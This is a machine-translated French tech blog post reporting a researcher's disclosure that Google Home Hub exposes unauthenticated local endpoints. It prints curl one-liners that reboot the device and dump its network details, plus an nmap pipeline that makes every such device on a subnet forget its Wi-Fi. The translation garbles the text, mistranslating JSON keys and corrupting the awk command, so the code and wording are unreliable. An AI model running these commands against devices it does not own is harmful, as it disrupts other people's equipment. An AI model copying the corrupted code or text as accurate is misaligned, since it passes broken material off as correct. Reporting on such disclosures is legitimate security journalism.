Gadgets

Google du centre d’Accueil peut être enlevé avec une seule ligne de code

La sécurité de l’avocat Jerry Gamblin a publié un ensemble d’instructions — essentiellement des lignes de base de XML qui peut facilement tirer des informations importantes au large de la Accueil Google Hub et, dans certains cas, temporairement brique du dispositif.

Le centre d’Accueil, qui est essentiellement un Android tablette relié à un haut-parleur, est conçu pour agir comme une salle de Google Assistant. Cela signifie qu’il se connecte à un réseau Wi-Fi (et permet de voir ouvrir une connexion Wi-Fi, points d’accès à proximité de l’appareil), reçoit des vidéos et des photos à partir d’autres appareils (et les émissions de ses broches) et accepte les commandes à distance (y compris un redémarrage rapide via la ligne de commande).

La commande, qui se compose d’une URL simple appel via la ligne de commande est clairement partie du processus d’installation. Vous pouvez essayer à la maison si vous remplacez le “hub” avec le centre d’Accueil de l’adresse IP locale:

curl-Lv-H Content-Type:application/json --data-raw '{"params":""}' http://hub:8008/setup/reboot

D’autres one-liners exposer d’autres données, y compris un certain nombre de micro-services:

$ curl-s http://hub:8008/setup/eureka_info | jq
{
"bssid": "cc:be:59:8c:11:8b",
"build_version": "136769",
"cast_build_revision": "1.35.136769",
"closed_caption": {},
"connecté": true,
"ethernet_connected": false,
"has_update": false,
"hotspot_bssid": "FA:8F:CA:9C:AA:11",
"adresse_ip": "192.168.1.1",
"locale": "fr-fr",
"localisation": {
"code_pays": "NOUS",
"latitude": 255,
"longitude": 255
},
"mac_address": "11:A1:1A:11:AA:11",
"nom": "Hub"Display",
"noise_level": -94,
"opencast_pin_code": "1111",
"opt_in": {
"crash": true,
"à ciel ouvert": true,
"stats": true
},
"public_key": "Supprimé",
"release_track": "stable-canal",
"setup_state": 60,
"setup_stats": {
"historically_succeeded": true,
"num_check_connectivity": 0,
"num_connect_wifi": 0,
"num_connected_wifi_not_saved": 0,
"num_initial_eureka_info": 0,
"num_obtain_ip": 0
},
"signal_level": -60,
"ssdp_udn": "11111111-adac-2b60-2102-11111aa111a",
"ssid": "SSID",
"paramètres time_format": 2,
"fuseau horaire": "America/Chicago",
"tos_accepted": true,
"uma_client_id": "1111a111-8404-437a-87f4-1a1111111a1a",
"temps de disponibilité": 25244.52,
"version": 9,
"wpa_configured": true,
"wpa_id": 0,
"wpa_state": 10
}

Enfin, cette ligne génère tous les périphériques de votre réseau d’oublier leur connexion Wi-Fi gratuite, ce qui vous oblige à entrer de nouveau le processus d’installation:

nmap-ouvert -p 8008 192.168.1.0/24 | awk '/est/ {print jusqu'}; {gsub (/(|)/,""); jusqu' = $NF}' | xargs -I % curl-Lv-H Content-Type:application/json --data-raw '{ "wpa_id": 0 }' http://%:8008/setup/forget_wifi

Comme Gamblin notes, ces trous ne sont pas les points de blocage, mais ils sont très alarmants. Permettant un accès non authentifié à ces services est paresseux, au mieux, et dangereux, au pire. Il note également que ces paramètres ont été ouvertes depuis plusieurs années sur divers Google périphériques, ce qui signifie que cette est une partie régulière de la base de code et non considéré comme un exploit par Google.

Encore une fois, rien ici n’est à mission critique — pas de centre d’Accueil sera jamais à sauver ma vie, mais il serait agréable de savoir que les appareils basés sur la plate-forme ont un minimum de sécurité, même dans la forme de l’authentification ou de la dissimulation de l’. Aujourd’hui, nous pouvons redémarrer grand-père est trop compliqué cadre photo avec une seule ligne de code, mais demain nous pouvons être en mesure de redémarrer grand-père du concentrateur d’oxygène.

About the author

Cyriac

Je suis Zeh Cyriac , fondateur et chef de la direction de la société informatique DROP Corporation Inc. et blogueur indépendant aux États-Unis, avec une passion pour l'Entrepreneuriat en ligne, le marketing de contenu et toutes les choses qui tournent au tour du digital et ’informatique .

Add Comment

Click here to post a comment

Newsletter

Les dernières nouvelles du Web, de la high-tech et de l'innovation numérique tous les matins à l'heure du petit déjeuner.

Vous avez parfaitement souscrit ! Consultez vos mails pour confirmer l'inscription .